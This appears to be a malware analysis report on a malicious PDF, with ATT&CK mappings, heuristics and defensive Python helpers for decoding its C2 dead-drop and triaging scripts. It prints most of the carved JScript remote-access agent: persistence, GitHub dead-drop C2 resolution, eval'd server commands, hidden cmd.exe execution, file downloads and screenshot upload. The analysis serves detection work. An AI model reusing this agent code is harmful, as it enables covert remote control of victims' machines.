Malicious PDF — malware analysis report

Static analysis result for SHA-256 b26718879e677213…

Verdict: MALICIOUS
File type: PDF
Size: 32.0 KB
First seen: 2021-06-17
MD5: 57d2d2c9eb067ad4f89ba8132a88b3e6
SHA-1: e7a3be7e51ffb3d120e8abe6db029da940655687
SHA-256: b26718879e677213519893d779ff5d655c85f3c1b66f9eb20f396c0f5000638b
Risk score: 244

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript; T1105 Ingress Tool Transfer; T1027 Obfuscated Files or Information; T1566.001 Spearphishing Attachment. Additional mappings supported by the carved script: T1102.001 Dead Drop Resolver (GitHub README pages encode the C2 address); T1059.003 Windows Command Shell (tasks run via cmd.exe /c); T1547.001 Registry Run Keys / Startup Folder and T1112 Modify Registry (services.lnk registered through the "run" value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows by reg import); T1518.001 Security Software Discovery (AntiVirusProduct via the SecurityCenter/SecurityCenter2 WMI namespaces); T1070.004 File Deletion (carrier and original script deleted after install).

The carved /JS object is a Windows Script Host (JScript) agent rather than Acrobat JavaScript: it instantiates WScript.Shell, Scripting.FileSystemObject and shell.application through ActiveXObject (T1059.007), copies itself to %localappdata%\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\file.js and persists by importing a .reg file that points the "run" value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows at a services.lnk shortcut, which runs cscript on startup.js (T1547.001, T1112). Obfuscation is light (T1027): every line ends in a //p0b2x6 marker comment, files fetched from the C2 arrive as hex text that hex2bin() rebuilds with String.fromCharCode, and the watchdog script kill.js is stored unescape()-encoded. The two raw.githubusercontent.com URLs are dead-drop resolvers, not payload sources (T1102.001): the agent loads a README.md in a hidden InternetExplorer.Application instance, matches 'our news start at (.*) thank you', divides the number by 666, converts the result to a dotted IPv4 address with num2dot(), and confirms the server by fetching <ip>/Validate/ValSrv and looking for the string youwillnotfindthisanywhare. The C2 loop then polls <ip>/Validate/getcommand with the 16-character id obtained from /Validate/getid (that registration also reports computer name, user name, script version 1.3, the ref value bd and the antivirus product read from the SecurityCenter2 WMI class, T1518.001). A task of the form download|<name>|<path> fetches hex-encoded content from /Validate/dwnld?u= and writes it to the named path (T1105); any other task is run hidden through cmd.exe /c (T1059.003). The loop also starts %localappdata%\Python\main.py once that file exists, uploads %localappdata%\Python\SC7.P7D base64-encoded as a sendScreenshot action, and re-resolves the server every hour. After installing it deletes the carrier file and its own original copy (T1070.004), and kill.js terminates COM-spawned iexplore.exe instances (command line containing -Embedding) every three minutes so the browser automation leaves no visible windows. The decoy shown to the user is 200_Germany.csv, carved from the carrier and opened with cmd.exe /c. The script itself contains no credential theft; it is a general-purpose remote-access agent whose follow-on activity depends on operator tasking. Given the PDF container, Spearphishing Attachment (T1566.001) is the likely initial access vector; the Acrobat-side stage that hands this script to WSH is not shown in the preview.
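The dead-drop resolution in extract_srvaddr() and num2dot() can be reproduced offline so that a hunter can turn a fetched README into the C2 address and the URL list to block, without running the sample. The block below is an added Python example written for this page, not code from the sample or from the analysis platform. The README text and the 203.0.113.7 address are constructed fixtures, and the http scheme is an assumption: the script hands InternetExplorer.Application a bare '<ip>/Validate/...' string with no scheme.

```python
import ipaddress
import re
from typing import List, Optional

# Regex and divisor copied from extract_srvaddr() in the carved script.
DEAD_DROP_PATTERN = re.compile(r"our news start at (.*) thank you", re.IGNORECASE)
DIVISOR = 666

# Paths the agent appends to "<ip>/Validate" (from main_loop, get_id, extract_srvaddr).
C2_PATHS = ("/ValSrv", "/getid", "/getcommand", "/dwnld?u=", "/zaqxswcde123456789")


def num2dot(num: int) -> str:
    """Port of the sample's num2dot(): 32-bit big-endian integer to dotted quad."""
    dotted = str(num % 256)
    for _ in range(3):
        num //= 256
        dotted = f"{num % 256}.{dotted}"
    return dotted


def decode_dead_drop(page_text: str) -> Optional[str]:
    """Recover the C2 IPv4 address from a fetched README, or None if absent.

    Mirrors the script (regex, divide by 666, num2dot) but rejects values that
    are not an exact multiple of 666 or do not fit in 32 bits; the script would
    divide in floating point and emit a nonsensical address instead.
    """
    match = DEAD_DROP_PATTERN.search(page_text)
    if match is None:
        return None
    raw = match.group(1).strip()
    if not raw.isdigit():
        return None
    quotient, remainder = divmod(int(raw), DIVISOR)
    if remainder or quotient > 0xFFFFFFFF:
        return None
    return num2dot(quotient)


def c2_urls(ip: str) -> List[str]:
    """URLs the agent will contact. The http scheme is an assumption: the script
    passes a bare '<ip>/Validate/...' string to InternetExplorer.Application.Navigate."""
    base = f"http://{ip}/Validate"
    return [base + path for path in C2_PATHS]


def encode_dead_drop(ip: str) -> str:
    """Inverse operation, useful for fixtures or a sinkhole README."""
    return f"our news start at {int(ipaddress.IPv4Address(ip)) * DIVISOR} thank you"


# Constructed fixture: a README as IE's innerHTML would present it (wrapped in
# <pre>, which the script strips). 203.0.113.7 is a documentation address.
SAMPLE_README = "<pre>Welcome to the news page.\nour news start at 2268265319478 thank you\n</pre>"

if __name__ == "__main__":
    c2 = decode_dead_drop(SAMPLE_README)
    print("C2 address:", c2)
    for url in c2_urls(c2):
        print("  ", url)
```

Network detections for this family should key on the fixed URI paths under /Validate rather than on the IP, since the address can be rotated by editing the README; the GitHub raw URLs themselves are worth blocking only as long as the two repositories exist.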

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics (8)

  • JavaScript action (severity: low; 4 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical; rule PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script (the end of hex2bin(), which turns hex text fetched from the C2 into bytes):
      //p0b2x6
      return String.fromCharCode.apply(String, bytes);  //p0b2x6
    } //p0b2x6
  • PDF JavaScript WScript downloader (severity: high; rule PDF_JS_WSCRIPT_DOWNLOADER)
    Decoded PDF JavaScript reconstructs a Windows Script Host COM downloader using WScript.CreateObject plus XMLHTTP/ADODB.Stream style download, write, and run behavior. This is commodity payload delivery rather than a specific PDF parser CVE trigger. In this sample the transport is a hidden InternetExplorer.Application instance rather than XMLHTTP; ADODB.Stream builds the POST body, base64-encodes the upload file and writes downloaded binaries in bin_write().
  • Embedded JS stream (severity: low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript contains an unrendered phishing-kit placeholder (severity: low; rule PDF_JS_TEMPLATE_PLACEHOLDER)
    Embedded JavaScript still contains an unrendered template / mail-merge placeholder (e.g. {SYSLINK}, {{recipient}}, '[[-Email-]]'). A delivered document has these substituted; an unrendered token means the file IS the phishing-kit template whose per-recipient URL / personalisation never ran. Complements PDF_URL_MAILMERGE_PLACEHOLDER, which only inspects annotation URIs.
    Matched line in script
      } else { //p0b2x6
       id = get_page_content_with_ie(server + "/getid", "action=getSerial&computer_name="+WshShell.ExpandEnvironmentStrings("%computername%")+"&username="+WshShell.ExpandEnvironmentStrings("%username%")+"&version="+version+"&cli="+ref); //p0b2x6
       if(id.length == 16) { //p0b2x6
    Caveat: the tokens matched here are %computername% and %username%, which the script passes to WshShell.ExpandEnvironmentStrings() and which Windows expands at run time. They are environment-variable references, not an unrendered mail-merge placeholder, so this finding is a false positive for this sample and is not evidence that the file is a kit template.
  • Page-word XOR JavaScript eval stager (severity: high; rule PDF_PAGE_WORD_XOR_EVAL_STAGER)
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
    Caveat: the carved /JS object previewed below is WSH JScript and contains neither getPageNthWord/getPageNumWords nor an XOR loop, and no separate Acrobat-side stager was carved. Confirm the matching object in the raw PDF before citing this rule.
  • Suspicious extracted artifact (severity: high; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs referenced by PDF JavaScript (the items[] array in the script; both are dead-drop pages from which the agent derives its C2 address, not payload downloads):
      https://raw.githubusercontent.com/deadpooool/news/master/README.md
      https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.md

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0003_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 3 at offset 0x75
Size: 31108 bytes
SHA-256: 6e6b3311264114f36c921a151c1cbba6171f6c0532e3de9aefed8b7997fb7ae8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 shell/COM execution token(s). Carved artifact contains 3 eval/decoder/string-building token(s).
Analyst notes
Every line of the carved script, blank lines included, ends with the comment marker //p0b2x6. A constant per-line marker is what a launcher needs to rebuild a script from a carrier file with a line filter; findstr-style carving is an inference here, since no launcher was carved. The script expects the carrier path as its first argument (WScript.arguments(0)), copies the decoy 200_Germany.csv out of it at offset lnk_filesize+1 (substr(start+1, ...)) and deletes the carrier afterwards, so the variable names suggest a 21890-byte .lnk with the CSV appended as the intended carrier; how this PDF object reaches WSH is not shown. The cscript.exe and python.exe command lines contain several hundred spaces before the script path; that padding is in the sample and pushes the argument past the width of fixed-width process-list views, so detections should match on the full command line rather than its visible prefix. The preview appears to cover the whole object, consistent with its 31108-byte size: the WSH agent followed by the appended decoy CSV.
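The token counts above come from a static triage rule of the analysis platform whose token lists are not published on this page. The Python below is an added example of the same kind of check, written for this page with its own token lists (so its counts will not equal the platform's); it also tests for the constant trailing //marker that every line of this script carries. The carve-by-line-filter launcher that such a marker implies is an inference, not something shown on the page. The input is a constructed excerpt of six lines copied from the preview below.

```python
import re
from collections import Counter
from typing import Dict, Optional

# Token lists are this example's own, chosen from the APIs the carved script uses.
EXEC_TOKENS = (
    "WScript.Shell", "Scripting.FileSystemObject", "shell.application",
    "InternetExplorer.Application", "ADODB.Stream", "Microsoft.XMLDOM",
    "winmgmts:", "WshShell.Run", "cscript", "cmd.exe", "CreateShortcut", "reg import",
)
DECODER_TOKENS = ("eval(", "unescape(", "String.fromCharCode", "parseInt(", "bin.base64")

TRAILING_COMMENT = re.compile(r"//(\S+)\s*$")


def count_tokens(text: str, tokens) -> Dict[str, int]:
    """Case-sensitive substring counts, keeping only tokens that occur."""
    return {tok: text.count(tok) for tok in tokens if tok in text}


def line_marker(text: str, threshold: float = 0.9) -> Optional[str]:
    """Trailing '//token' shared by at least `threshold` of the non-blank lines.

    A constant suffix on nearly every line, blank ones included, is what a
    launcher needs in order to rebuild the script from a carrier file with a
    line filter such as findstr (an inference about this sample, not shown here).
    """
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if not lines:
        return None
    tails: Counter = Counter()
    for ln in lines:
        m = TRAILING_COMMENT.search(ln)
        if m:
            tails[m.group(1)] += 1
    if not tails:
        return None
    token, hits = tails.most_common(1)[0]
    return token if hits / len(lines) >= threshold else None


def triage(text: str) -> dict:
    """Score a carved script: execution surface plus decoding or a carve marker."""
    exec_hits = count_tokens(text, EXEC_TOKENS)
    decoder_hits = count_tokens(text, DECODER_TOKENS)
    marker = line_marker(text)
    return {
        "exec_tokens": exec_hits,
        "exec_total": sum(exec_hits.values()),
        "decoder_tokens": decoder_hits,
        "decoder_total": sum(decoder_hits.values()),
        "line_marker": marker,
        "suspicious": bool(exec_hits) and (bool(decoder_hits) or marker is not None),
    }


# Constructed excerpt: six lines copied from the preview of javascript_obj0003_000.js.
SAMPLE_SCRIPT = """\
 //p0b2x6
var WshShell = new ActiveXObject("WScript.Shell"); //p0b2x6
var fso = new ActiveXObject("Scripting.FileSystemObject"); //p0b2x6
WshShell.Run("reg import "+g3r, 0, 1); //p0b2x6
eval("obj=" +command); //p0b2x6
return String.fromCharCode.apply(String, bytes); //p0b2x6
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

Token counting alone is noisy on legitimate admin scripts that also touch WScript.Shell; the marker test adds a structural signal that benign scripts almost never show, which is why the verdict requires the execution surface plus either a decoder token or the marker.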
Preview script
First 1,000 lines of the extracted script
try {
  //p0b2x6
var WshShell = new ActiveXObject("WScript.Shell"); //p0b2x6
var fso = new ActiveXObject("Scripting.FileSystemObject"); //p0b2x6
var shellApp = new ActiveXObject("shell.application"); //p0b2x6
 //p0b2x6
version = "1.3" //p0b2x6
ref = "bd" //p0b2x6
 //p0b2x6
items = ['https://raw.githubusercontent.com/deadpooool/news/master/README.md','https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.md']; //p0b2x6
StorageDir = WshShell.ExpandEnvironmentStrings("%localappdata%")+"\\Microsoft\\PackageCache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"; //p0b2x6
extracted_file = "200_Germany.csv    "; //p0b2x6
extracted_file_filesize = 12692              ; //p0b2x6
lnk_filesize = 21890              ; //p0b2x6
startup_shortcut = StorageDir + "\\services.lnk"; //p0b2x6
agent_location = StorageDir + "\\file.js"; //p0b2x6
agent_hidden_executer = StorageDir + "\\startup.js"; //p0b2x6
g3r = StorageDir + "\\g3r.reg"; //p0b2x6
agent_id_location = StorageDir + "\\id"; //p0b2x6
lckFile = StorageDir+"\\h.lck"; //p0b2x6
ieFile = StorageDir + "\\kill.js"; //p0b2x6
av = return_av_name(); //p0b2x6
pFolder = WshShell.ExpandEnvironmentStrings("%localappdata%")+"\\Python"; //p0b2x6
sctFile = pFolder+ "\\SC7.P7D"; //p0b2x6
pyFile = "main.py"; //p0b2x6
pyAlreadyRunning = 0; //p0b2x6
 //p0b2x6
if(av.length != av.replace("Kasper", "").length) //p0b2x6
{ //p0b2x6
	kasper = 1; //p0b2x6
} //p0b2x6
else //p0b2x6
{ //p0b2x6
	kasper = 0; //p0b2x6
} //p0b2x6
kasperWritten = 0; //p0b2x6
main(); //p0b2x6
 //p0b2x6
function main() { //p0b2x6
	if(WScript.ScriptFullName != agent_location) { //p0b2x6
		extract_and_run_decoy(); //p0b2x6
		create_storage_dir(); //p0b2x6
		create_ie_file(); //p0b2x6
		create_startup_executer(); //p0b2x6
		copy_agent_to_new_location(); //p0b2x6
		exec_cscript(agent_location); //p0b2x6
		delete_temp_files(); //p0b2x6
	} else { //p0b2x6
		lck = fso.CreateTextFile(lckFile, 1); //p0b2x6
		exec_cscript(ieFile); //p0b2x6
		main_loop(); //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function main_loop() { //p0b2x6
		var now = get_time(); //p0b2x6
		r3g(); //p0b2x6
		if(kasper == 1 && fso.FileExists(agent_id_location) == false && kasperWritten == 0) //p0b2x6
		{ //p0b2x6
			WshShell.Run("reg import "+g3r, 0, 1); //p0b2x6
			create_shortcut_in_startup(); //p0b2x6
			kasperWritten = 1; //p0b2x6
		} //p0b2x6
		else //p0b2x6
		{ //p0b2x6
			WshShell.Run("reg import "+g3r, 0, 1); //p0b2x6
			create_shortcut_in_startup(); //p0b2x6
 //p0b2x6
		} //p0b2x6
 //p0b2x6
		server = extract_srvaddr(); //p0b2x6
		try { //p0b2x6
			id = get_id(); //p0b2x6
			while(1) { //p0b2x6
				 //p0b2x6
				var passedsec = get_time()-now; //p0b2x6
				if(passedsec > 60*60){ //p0b2x6
					now = get_time(); //p0b2x6
					server = extract_srvaddr(); //p0b2x6
				} //p0b2x6
				 //p0b2x6
				command = get_page_content_with_ie(server + "/getcommand", "action=getCommand&uid="+id); //p0b2x6
				eval("obj=" +command); //p0b2x6
				if(obj.command.length > 0) { //p0b2x6
					if(obj.command.search('download') >= 0) { //p0b2x6
						var spl = obj.command.split('|'); //p0b2x6
						file = get_page_content_with_ie(server + "/dwnld?u="+spl[1], ""); //p0b2x6
						if(file.length > 0) { //p0b2x6
							bin_write(spl[2], hex2bin(file)); //p0b2x6
						} //p0b2x6
					} else { //p0b2x6
						WshShell.Run("cmd.exe /c " +obj.command, 0, 0); //p0b2x6
					} //p0b2x6
					WScript.Sleep(10000); //p0b2x6
				} else { //p0b2x6
					WScript.Sleep(30000); //p0b2x6
				} //p0b2x6
				 //p0b2x6
				if(fso.FileExists(pFolder+"\\"+pyFile) && pyAlreadyRunning == 0) { //p0b2x6
					oldWd = WshShell.CurrentDirectory; //p0b2x6
					WshShell.CurrentDirectory = pFolder; //p0b2x6
					 //p0b2x6
					pyAlreadyRunning = 1; //p0b2x6
					WshShell.Run("python.exe                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     "+pyFile, 0, 0); //p0b2x6
						 //p0b2x6
					WshShell.CurrentDirectory = oldWd; //p0b2x6
				} //p0b2x6
				 //p0b2x6
				if(fso.FileExists(sctFile)) { //p0b2x6
					sctb64 = base64_encode(sctFile); //p0b2x6
					screen = get_page_content_with_ie(server + "/zaqxswcde123456789", "action=sendScreenshot&uid="+id+"&data="+sctb64); //p0b2x6
					fso.DeleteFile(sctFile, 1); //p0b2x6
				} //p0b2x6
				 //p0b2x6
			} //p0b2x6
		} catch (e) { //p0b2x6
			WScript.Sleep(60000); //p0b2x6
			main_loop(); //p0b2x6
		} //p0b2x6
} //p0b2x6
 //p0b2x6
function get_id() { //p0b2x6
	id = ""; //p0b2x6
	while(id.length != 16) { //p0b2x6
		if(fso.FileExists(agent_id_location)) { //p0b2x6
			f = fso.OpenTextFile(agent_id_location, 1); //p0b2x6
			while (!f.AtEndOfStream) { //p0b2x6
				id += f.ReadLine(); //p0b2x6
			} //p0b2x6
			f.Close(); //p0b2x6
			up = get_page_content_with_ie(server + "/getid", "action=up&uid="+id+"&antivirus="+return_av_name()); //p0b2x6
		} else { //p0b2x6
			id = get_page_content_with_ie(server + "/getid", "action=getSerial&computer_name="+WshShell.ExpandEnvironmentStrings("%computername%")+"&username="+WshShell.ExpandEnvironmentStrings("%username%")+"&version="+version+"&cli="+ref); //p0b2x6
			if(id.length == 16) { //p0b2x6
				var s = fso.CreateTextFile(agent_id_location, true); //p0b2x6
				s.Write(id); //p0b2x6
				s.Close(); //p0b2x6
				up = get_page_content_with_ie(server + "/getid", "action=up&uid="+id+"&antivirus="+return_av_name()); //p0b2x6
			} //p0b2x6
		} //p0b2x6
		WScript.Sleep(30000); //p0b2x6
	} //p0b2x6
	return id; //p0b2x6
} //p0b2x6
 //p0b2x6
function get_page_content_with_ie(url, postdata) { //p0b2x6
	try{ //p0b2x6
		var ie = new ActiveXObject("InternetExplorer.Application"); //p0b2x6
		ie.Visible = 0; //p0b2x6
		if(postdata.length == 0) { //p0b2x6
			ie.Navigate(url); //p0b2x6
		} else { //p0b2x6
			ie.Navigate(url, "", "", stream_string_to_binary(postdata), "Content-Type: application/x-www-form-urlencoded"); //p0b2x6
		} //p0b2x6
		i = 0; //p0b2x6
		while(i < 60) { //p0b2x6
			if(ie.ReadyState == 4) { //p0b2x6
				i = 60; //p0b2x6
			} //p0b2x6
			WScript.Sleep(1000); //p0b2x6
			i = i + 1; //p0b2x6
		} //p0b2x6
		content = ie.document.body.innerHTML; //p0b2x6
		content = content.replace("&amp;", "&"); //p0b2x6
		content = content.replace("&gt;", ">"); //p0b2x6
		content = content.replace("&lt;", "<"); //p0b2x6
		content = content.replace('&quot;', '"'); //p0b2x6
		content = content.replace("<pre>", ""); //p0b2x6
		content = content.replace("</pre>", ""); //p0b2x6
		content = content.replace("<PRE>", ""); //p0b2x6
		content = content.replace("</PRE>", ""); //p0b2x6
		ie.Quit(); //p0b2x6
		delete ie; //p0b2x6
		return content; //p0b2x6
	} catch (e) { //p0b2x6
			return ''; //p0b2x6
		} //p0b2x6
} //p0b2x6
 //p0b2x6
function stream_string_to_binary(str) { //p0b2x6
	var BinaryStream = WScript.CreateObject('ADODB.Stream'); //p0b2x6
	BinaryStream.Type = 2; //p0b2x6
	BinaryStream.CharSet = "us-ascii" //p0b2x6
	 //p0b2x6
	BinaryStream.Open(); //p0b2x6
	BinaryStream.WriteText(str); //p0b2x6
	BinaryStream.Position = 0; //p0b2x6
	BinaryStream.Type = 1; //p0b2x6
	 //p0b2x6
	return BinaryStream.read(); //p0b2x6
} //p0b2x6
 //p0b2x6
function num2dot(num) { //p0b2x6
	var d = num%256; //p0b2x6
	for (var i=3; i>0; i--) { //p0b2x6
		num = Math.floor(num/256); //p0b2x6
		d = num%256+'.'+d; //p0b2x6
	} //p0b2x6
	return d; //p0b2x6
} //p0b2x6
 //p0b2x6
function get_time() { //p0b2x6
	var date = new Date(); //p0b2x6
	return date.getTime()/1000|0; //p0b2x6
} //p0b2x6
 //p0b2x6
function extract_srvaddr() { //p0b2x6
	serverFound = false; //p0b2x6
	pattern = 'our news start at (.*) thank you'; //p0b2x6
	while(serverFound == false) { //p0b2x6
		var item = items[Math.floor(Math.random()*items.length)]; //p0b2x6
		var html = get_page_content_with_ie(item,''); //p0b2x6
		if(html != '') { //p0b2x6
			var match = extract_string(pattern, html); //p0b2x6
			if(match != null) { //p0b2x6
				srv = num2dot(match[1]/666); //p0b2x6
				srv = srv + "/Validate"; //p0b2x6
				srv_stat = get_page_content_with_ie(srv+"/ValSrv", ''); //p0b2x6
				validate_str = extract_string('youwillnotfindthisanywhare', srv_stat); //p0b2x6
				if(validate_str == 'youwillnotfindthisanywhare') { //p0b2x6
					serverFound = true; //p0b2x6
					return srv; //p0b2x6
				} //p0b2x6
			} //p0b2x6
		} //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function extract_string(pattern, str) { //p0b2x6
	if(pattern != '' && str != '') { //p0b2x6
		try { //p0b2x6
			re = new RegExp(pattern, 'i') //p0b2x6
			match = str.match(re); //p0b2x6
			return match; //p0b2x6
		} catch (e) { //p0b2x6
			return null; //p0b2x6
		} //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function r3g() { //p0b2x6
	var s = fso.CreateTextFile(g3r, true); //p0b2x6
	s.WriteLine('Windows Registry Editor Version 5.00'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]'); //p0b2x6
	s.WriteLine('"run"="' +StorageDir.replace(/\\/g, "\\\\")+ '\\\\services.lnk"'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Control Panel\\Cursors]'); //p0b2x6
	s.WriteLine('"AppStarting"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,00'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); //p0b2x6
	s.WriteLine('"Check_Associations"="no"'); //p0b2x6
	s.WriteLine('"NoProtectedModeBanner"=dword:00000001'); //p0b2x6
	s.WriteLine('"IE10RunOncePerInstallCompleted"=dword:00000001'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Recovery]'); //p0b2x6
	s.WriteLine('"AutoRecover"=dword:00000002'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PhishingFilter]'); //p0b2x6
	s.WriteLine('"EnabledV9"=dword:00000001'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation]'); //p0b2x6
	s.WriteLine('"MSCompatibilityMode"=dword:00000001'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]'); //p0b2x6
	s.WriteLine('"EnableBalloonTips"=dword:00000000'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]'); //p0b2x6
	s.WriteLine('"GlobalUserOffline"=dword:00000000'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]'); //p0b2x6
	s.WriteLine('"2500"=dword:00000003'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner]'); //p0b2x6
	s.WriteLine('"BrowserMonitoring"=-'); //p0b2x6
	s.WriteLine('"(Mon)3001"=-'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.Close(); //p0b2x6
} //p0b2x6
 //p0b2x6
function return_av_name() { //p0b2x6
	try { //p0b2x6
		var oWMISrvc = GetObject("winmgmts:\\\\.\\root\\cimv2"); //p0b2x6
		var colOperatingSystems = oWMISrvc.ExecQuery("SELECT * FROM Win32_OperatingSystem"); //p0b2x6
		 //p0b2x6
		var objItem = new Enumerator(colOperatingSystems);	 //p0b2x6
		for(;!objItem.atEnd();objItem.moveNext()) { //p0b2x6
			var version = objItem.item().Version.substr(0,3); //p0b2x6
		} //p0b2x6
		objWMIService = ""; //p0b2x6
		try { //p0b2x6
			var objWMIService = GetObject("winmgmts:\\\\.\\root\\SecurityCenter"); //p0b2x6
 //p0b2x6
		} catch(e) {} //p0b2x6
			try { //p0b2x6
				var objWMIService = GetObject("winmgmts:\\\\.\\root\\SecurityCenter2"); //p0b2x6
			} catch (e) {} //p0b2x6
				if (typeof(objWMIService) == "string") //p0b2x6
				{ //p0b2x6
					return 'N/A'; //p0b2x6
				} //p0b2x6
				var colItems = objWMIService.ExecQuery("SELECT displayName FROM AntiVirusProduct", "WQL"); //p0b2x6
				 //p0b2x6
				var enumItems = new Enumerator(colItems); //p0b2x6
				name = ""; //p0b2x6
				for (;!enumItems.atEnd();enumItems.moveNext()) { //p0b2x6
					name = enumItems.item().displayName+" and "+name; //p0b2x6
				} //p0b2x6
				 //p0b2x6
				if(name != null && name != '') { //p0b2x6
					return name; //p0b2x6
				} else { //p0b2x6
					return 'N/A'; //p0b2x6
				} //p0b2x6
	} catch (e) { //p0b2x6
		return 'N/A'; //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function CreateFolderRecursive(FullPath) { //p0b2x6
	var arr = [], dir = [], path = [] //p0b2x6
	 //p0b2x6
	arr = FullPath.split("\\"); //p0b2x6
	path = ""; //p0b2x6
	for(index=0; index<arr.length; ++index) { //p0b2x6
		if(path != "") //p0b2x6
			path = path+"\\"; //p0b2x6
		path = path+""+arr[index]; //p0b2x6
		if(!fso.FolderExists(path)) { //p0b2x6
			try { //p0b2x6
				fso.CreateFolder(path); //p0b2x6
			} catch (e) { //p0b2x6
			} //p0b2x6
		} //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function copy_agent_to_new_location() { //p0b2x6
	fso.CopyFile(WScript.ScriptFullName, agent_location); //p0b2x6
} //p0b2x6
 //p0b2x6
function create_startup_executer() { //p0b2x6
	var s = fso.CreateTextFile(agent_hidden_executer, true); //p0b2x6
	s.WriteLine('var WshShell = new ActiveXObject("WScript.Shell");'); //p0b2x6
	s.WriteLine('WshShell.Run("C:\\\\Windows\\\\System32\\\\cscript.exe                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    '+agent_location.replace(/\\/g, "\\\\")+'", 0, 0);'); //p0b2x6
	s.Close(); //p0b2x6
} //p0b2x6
 //p0b2x6
function create_shortcut_in_startup() { //p0b2x6
	var oShellLink = WshShell.CreateShortcut(startup_shortcut);  //p0b2x6
	oShellLink.TargetPath = "%comspec%";  //p0b2x6
	oShellLink.Arguments = "/c cscript "+agent_hidden_executer;  //p0b2x6
	oShellLink.WindowStyle = 7;  //p0b2x6
	oShellLink.WorkingDirectory = StorageDir;  //p0b2x6
	oShellLink.Save(); //p0b2x6
} //p0b2x6
 //p0b2x6
 //p0b2x6
function create_storage_dir() { //p0b2x6
	if(!fso.FolderExists(StorageDir)) { //p0b2x6
		CreateFolderRecursive(StorageDir); //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function create_ie_file() { //p0b2x6
	if(!fso.FileExists(ieFile)) { //p0b2x6
		var s = fso.CreateTextFile(ieFile, true); //p0b2x6
		s.WriteLine(unescape("var%20oWMISrvc%20%3D%20GetObject%28%22winmgmts%3A%5C%5C%5C%5C.%5C%5Croot%5C%5Ccimv2%22%29%3Bwhile%281%29%7BWScript.Sleep%28180000%29%3B%20cProcNIE%28%29%3B%7Dfunction%20cProcNIE%28%29%20%7Btry%20%7Bvar%20colProcLst%20%3D%20oWMISrvc.ExecQuery%28%22SELECT%20*%20FROM%20Win32_Process%20WHERE%20CommandLine%20LIKE%20%27%25-Embedding%25%27%20AND%20Name%20%3D%20%27iexplore.exe%27%22%29%3Bvar%20objItem%20%3D%20new%20Enumerator%28colProcLst%29%3Bfor%28%3B%21objItem.atEnd%28%29%3BobjItem.moveNext%28%29%29%20%7Bvar%20p%20%3D%20objItem.item%28%29%3Bp.Terminate%28%29%3B%7D%7D%20catch%20%20%28e%29%20%7B%7D%7D")); //p0b2x6
		s.Close(); //p0b2x6
